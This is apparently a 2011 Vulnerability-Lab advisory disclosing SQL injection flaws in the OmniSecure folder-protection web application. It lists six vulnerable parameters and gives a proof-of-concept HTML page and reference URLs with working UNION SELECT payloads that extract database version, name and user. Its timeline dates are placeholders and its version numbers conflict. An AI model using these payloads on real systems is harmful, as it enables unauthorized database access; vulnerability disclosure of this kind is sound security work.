Document Title:
===============
OmniSecure v7.x DLX - Multiple SQL Injection Vulnerabilities



Release Date:
=============
2011-07-15


Vulnerability Laboratory ID (VL-ID):
====================================
101


Product & Service Introduction:
===============================
One Click Folder Protection
Whether you are protecting tens of files or thousands of files, it only takes a few simple steps to protect all your folders 
instantly with Omni Secure folder protection. File type does not matter. These include anyting from.php, to .doc, to .xls, to 
pdf, to .zip, streaming videos etc.

Multi-Directional Login Forms
Easily create customized, multi-directional login forms. Manage your users from a single login form that not only determines 
what group each user is assigned to, but which has the power to automatically redirects each individual user to appropriate 
folders and pages.

Manages Unlimited Groups
Totally simple! Members belong to Groups and Groups belong to Protected Folders. You determine which Protected Folder(s) each Group may access.

Manages Unlimited Users
Large databases of users are only as valuable as the system that manages them. With OSS you manage a virtually unlimited number of users that 
allows you to view, edit, lock, delete or modify in dozens of way, all accounts. And you may do this individually or by group.
...   ...

(Copy of theVendor Homepage: http://www.omni-secure.com/index.php)


Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered multiple SQL Injection Vulnerabilities on OmniSecure v6.1.1 Deluxe.


Vulnerability Disclosure Timeline:
==================================
2011-00-00:	Vendor Notification
2011-00-00:	Vendor Response/Feedback
2011-00-00:	Vendor Fix/Patch
2011-00-00:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
Multiple SQL Injection Vulnerabilities are detected on OmniSecure. Attackers can compromise the application dbms & the application 
content via sql injection. The bug allows an remote attacker to inject own sql statements over the vulnerable web application.



Vulnerable Modules:
			[+] Login Edit
			[+] Add User
			[+] Add Banners
			[+] SignupCode
			[+] AddUrlShield



Pictures:
			../sql1.png
			../sql2.png
			../sql3.png


Proof of Concept (PoC):
=======================
The vulnerabilities can be exploited by local restricted user accounts & remote attackers. For demonstration or reproduce ...


File:			index.php
Para:			?module=CodeGen&action=CustomLoginEdit&id=

File:			index.php
Para:			?module=Members&action=AddUser&id=

File:			index.php
Para:			?module=System&action=AffAddBanner&id=

File:			index.php
Para:			?module=Members&action=AddGroup&id=

File:			index.php
Para:			?module=CodeGen&action=SignupCode&FormID=

File:			index.php
Para:			?module=UrlProtect&action=AddUrlShield&id=


<html>
<head><body>
<title>omnisecure v6.1.1 Deluxe - SQL Injection "PoC"</title>
<iframe src=http://www.vulnerability-lab.com/new_demo/index.php?module=CodeGen&action=CustomLoginEdit&id=9%20union%20all%20select%201,2,3,@@version-->
<iframe src=http://www.vulnerability-lab.com/new_demo/index.php?module=Members&action=AddUser&id=3%20union%20all%20select%201,@@version,database%28%29,4,user%28%29,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,%27x%27,23,24,25,26,@@version,28-->
<iframe src=http://www.vulnerability-lab.com/new_demo/index.php?module=UrlProtect&action=AddUrlShield&id=-25%20union%20all%20select%201,2,@@version,4,5-->
<iframe src=http://www.vulnerability-lab.com/new_demo/index.php?module=System&action=AddAdmin&id=11%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-->
<br><h1>PWND by rem0ve & x4lt with l0ve :)</h1> </br>
</body></head>
</html>


References: Transfer-Queue
http://www.vulnerability-lab.com/new_demo/index.php?module=CodeGen&action=CustomLoginEdit&id=9%20union%20all%20select%201,2,3,@@version--
http://www.vulnerability-lab.com/new_demo/index.php?module=Members&action=AddUser&id=3%20union%20all%20select%201,@@version,database%28%29,4,user%28%29,6,7,8,9,10,11,12,@@version,14,15,16,17,18,19,20,21,%27x%27,23,24,25,26,@@version,28--
http://www.vulnerability-lab.com/new_demo/index.php?module=System&action=AffAddBanner&id=
http://www.vulnerability-lab.com/new_demo/index.php?module=Members&action=AddGroup&id=
http://www.vulnerability-lab.com/new_demo/index.php?module=UrlProtect&action=AddUrlShield&id=-25%20union%20all%20select%201,2,@@version,4,5--
http://www.vulnerability-lab.com/new_demo/index.php?module=CodeGen&action=SignupCode&FormID=
http://www.vulnerability-lab.com/new_demo/index.php?module=System&action=AddAdmin&id=11%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--



Security Risk:
==============
The security risk of the multiple sql injection vulnerabilities are estimated as critical.


Credits & Authors:
==================
Vulnerability Research Laboratory


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory